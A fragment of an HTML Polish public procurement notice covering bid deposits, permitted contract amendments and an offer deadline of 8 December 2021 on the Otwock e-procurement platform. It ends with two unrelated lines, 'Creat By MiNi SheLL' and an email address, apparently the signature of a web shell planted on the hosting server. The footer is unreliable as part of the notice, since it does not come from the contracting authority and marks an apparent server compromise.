class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>cz. I - 1 000,00 zł.<br/>cz. II – 2 000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Wszelkie dopuszczalne zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności. <br/>2. Zamawiający przewiduje możliwość dokonania zmian umowy, w następujących przypadkach:<br/>1)	w przypadku zmiany przepisów prawa – dopuszczalna jest taka zmiana umowy, która umożliwi dostosowanie postanowień niniejszej umowy do nowych przepisów prawa,<br/>2)	wystąpienia zmiany terminu zakończenia robót w związku z:<br/>a)	opóźnieniami wynikającymi z okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,<br/>b)	brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych,<br/>c)	działaniem siły wyższej, <br/>d)	wstrzymaniem prac przez właściwy organ z przyczyn niezawinionych przez Wykonawcę,<br/>e)	koniecznością wykonania zamówień zamiennych, <br/>f)	wstrzymania przez Zamawiającego lub inne służby nadzoru wykonywania robót z przyczyn niezależnych od Wykonawcy robót,<br/>g)	skrócenie terminu wykonania przedmiotu umowy - na wniosek Wykonawcy,<br/>3)	konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający działając z należytą starannością nie mógł przewidzieć, zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny nie przekracza 50% wartości pierwotnej umowy.<br/>4)	Zmiany kierownika budowy, na wniosek Wykonawcy w przypadku:<br/>a)	choroby lub innych zdarzeń losowych dotyczących kierownika budowy,<br/>b)	nie wywiązywania się kierownika budowy/robót z obowiązków wynikających z Umowy,<br/>c)	jeżeli zmiana kierownika budowy stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji),<br/>5)	zmiany kierownika budowy na wniosek Zamawiającego w przypadku gdy nie wykonuje on swoich obowiązków wynikających z Umowy. <br/>6)	zmian postanowień niniejszej Umowy będących następstwem zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu Umowy,<br/>7)	zmiany technologii lub elementów przedmiotu Umowy, których konieczność wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej Umowy.<br/>3.	Wykonawca może przenieść wierzytelność z niniejszej Umowy dotyczącą zapłaty wynagrodzenia na rzecz osób trzecich, wyłącznie za uprzednią zgodą Zamawiającego wyrażoną na piśmie.<br/>4.	Wykonawca zobowiązany jest do pisemnego powiadomienia Zamawiającego o każdej groźbie opóźnienia robót. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-08 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma: https://otwock.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-08 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com